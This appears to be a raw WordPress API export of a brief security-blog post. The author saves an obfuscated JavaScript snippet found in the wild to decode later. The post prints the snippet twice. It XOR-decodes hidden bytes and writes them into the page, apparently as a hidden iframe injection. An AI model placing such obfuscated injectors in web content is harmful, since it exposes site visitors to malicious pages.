This is a random javascript snippet I found today which I will analyze later. Just recording for posterity.<\/p>\n
It seems like it could be a more advanced unpacker then most of the lame ones I normally see. wait, i just ran through the code again and it’s lame. oh well. At least later I can figure out what it says decoded…<\/p>\n","protected":false},"excerpt":{"rendered":" This is a random javascript snippet I found today which I will analyze later. Just recording for posterity. <script language=”JavaScript”>e = ‘0x00′ + ’27’;str1 = “%9C%C4%CF%D2%B8%D5%D4%DF% CC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C% CF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7% C6%C5%8A%C5%C9%CB%89%D4%D6%C2%89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF% C1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A”; str=tmp=”; for(i=0;i<str1.length;i+=3) {tmp = unescape(str1.slice(i,i+3)); str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);} document.write(str);<\/script> It seems like it could be a more advanced unpacker then most of the lame ones I normally […]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272],"tags":[],"class_list":["post-168","post","type-post","status-publish","format-standard","hentry","category-digital-warfare"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=168"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/168\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script language=\"JavaScript\">e = '0x00' + '27';str1 = \"%9C%C4%CF%D2%B8%D5%D4%DF%
\nCC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C%
\nCF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7%
\nC6%C5%8A%C5%C9%CB%89%D4%D6%C2%89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF%
\nC1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A\";
\nstr=tmp='';
\nfor(i=0;i<str1.length;i+=3)
\n{tmp = unescape(str1.slice(i,i+3));
\nstr=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}
\ndocument.write(str);<\/script><\/code><\/p>\n